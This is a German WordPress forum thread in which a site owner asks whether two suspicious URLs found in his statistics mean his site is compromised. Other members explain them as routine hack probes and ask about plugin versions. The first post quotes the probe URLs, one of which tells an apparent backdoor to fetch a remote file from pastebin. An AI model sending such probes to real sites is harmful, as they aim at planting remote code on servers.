1. Herzlich willkommen bei WPDE.org, dem grössten und ältesten deutschsprachigen Community-Forum rund um das Thema WordPress. Du musst angemeldet oder registriert sein, um Beiträge verfassen zu können.
    Information ausblenden

WP-Installation von Schadware befallen?

Dieses Thema im Forum "Allgemeines" wurde erstellt von eyoh58, 23. Februar 2020.

  1. eyoh58

    eyoh58 New Member

    Registriert seit:
    23. Februar 2020
    Beiträge:
    3
    Zustimmungen:
    0
    Guten Abend!

    Habe seit ca. 2 Jahren eine WP Installation laufen, bisher hat auch alles top funktioniert, bis auf dass mal der Name und die Adresse der Website durch nen Bug im Plugin "YellowPencil" geändert wurden. Das Problem konnte ich damals aber schnell beheben. (https://wordpress.org/support/topic/webpage-hacked-report-yellowpencil/)

    Nun ist mir aber in meinem Statistik-Plugin aufgefallen das viele offensichtlich unseriöse bzw. zwielichtige Websites vorallem mit russischer TLD auf 2 Links

    meinedomain.tld/?xxxxxxxxxxxx_loads=1&xxxxxxxxxxxx_filename=info.txt&xxxxxxxxxxxx_filecontent=INF0
    meinedomain.tld//?testingfsoc=1&url=https://pastebin.com/raw/i1gLLhHJ&filename=wpdemos

    verweisen.

    Wenn ich die Links aufrufe gelange ich einfach nur auf die Startseite.

    Handelt es sich hierbei um eine Weiterleitung auf eine Datei o.ä. ?


    Da ich überall Strenge Passwörter verwende und alle meine Plugins aktuell halte kann ich mir nicht vorstellen das es sich hierbei um irgend eine Form von Schadware handelt.


    Hat einer von euch eine Idee was da los sein könnte? Könnte das evtl. noch mit dem "YellowPencil Hack" zusammenhängen ?

    Und hätte jemand evtl. ne Empfehlung für ein Taugliches Anti-Virus für Wordpress?

    Unten findet ihr noch eine Übersicht über meine verwendeten Plugins.

    Danke im Voraus und schöne Grüße!



    [​IMG]
     
    #1 eyoh58, 23. Februar 2020
    Zuletzt bearbeitet: 23. Februar 2020
  2. pascal88

    pascal88 Well-Known Member

    Registriert seit:
    12. September 2014
    Beiträge:
    83
    Zustimmungen:
    9
    Hi,

    stimmt die oben genannte Anzahl der Plugins [ Alle (10) ] mit den gelisteten (10 Stück) überein?
    https://labs.sucuri.net/webshell-in-fake-plugin-blnmrpb-directory/

    Wenn ja, unbedenklich. Hack-Versuche gibt es unzählige, wenn man mal die Access Logs durchgeht. Allerlei Aufrufe üblicher "Standard Backdoors" und Tests auf weit verbreitete Sicherheitslücken..
    Je bekannter eine Site, desto mehr davon gibt es.

    Du kannst dir die NinjaFirewall oder Wordfence mal anschauen.
    Ein Security Plugin ist aber nicht notwendig, wenn du die Updates ständig im Blick hast und zudem eine sinnvolle Backup Strategie verfolgst.
    Sensibilisiert bist du ja schon durch die YellowPencil Lücke.

    Gruß

    Pascal
     
    eyoh58 gefällt das.
  3. eyoh58

    eyoh58 New Member

    Registriert seit:
    23. Februar 2020
    Beiträge:
    3
    Zustimmungen:
    0
    Hi Pascal,

    danke für die Schnelle Antwort!

    Auf'm ftp unter wp-content/plugins liegen nur die 10 Ordner der 10 Plugins die ich auch Installiert habe.

    Schneit also alles in Ordnung zu sein.

    Jo, hatte bisher auch keine weiteren Probleme außer halt die Sache mit YellowPencil. Schau mir die 2 Plugins aber trotzdem mal an!

    Danke nochmal und Gruß
     
  4. b3317133

    b3317133 Well-Known Member

    Registriert seit:
    21. November 2014
    Beiträge:
    8.617
    Zustimmungen:
    982
    Fragen am Rande:

    Woher stammt dieses "Power Builder" Plugin? Wie alt ist es? Gäbe es Updates beim Hersteller?

    Welche Version des "YellowPencil" Plugins wird verwendet? Zitat von der Herstellerseite:
    Generell: Beim Posten von Pluginlisten am besten immer die Versionen mitposten...
     
  5. eyoh58

    eyoh58 New Member

    Registriert seit:
    23. Februar 2020
    Beiträge:
    3
    Zustimmungen:
    0
    Power Builder ist ein Pagebuilder von Templatemonster und war beim Theme dabei. Da gabs seit der Installation meines Wissens nach kein Updatet, zumindest habe ich bei Templatemonster keins gefunden.

    YellowPencil ist auf der aktuellsten version (7.2.8).

    Jo, danke für den Hinweis.
     
  1. Diese Seite verwendet Cookies, um Inhalte zu personalisieren, diese deiner Erfahrung anzupassen und dich nach der Registrierung angemeldet zu halten.
    Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies.
    Information ausblenden
  1. Diese Seite verwendet Cookies, um Inhalte zu personalisieren, diese deiner Erfahrung anzupassen und dich nach der Registrierung angemeldet zu halten.
    Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies.
    Information ausblenden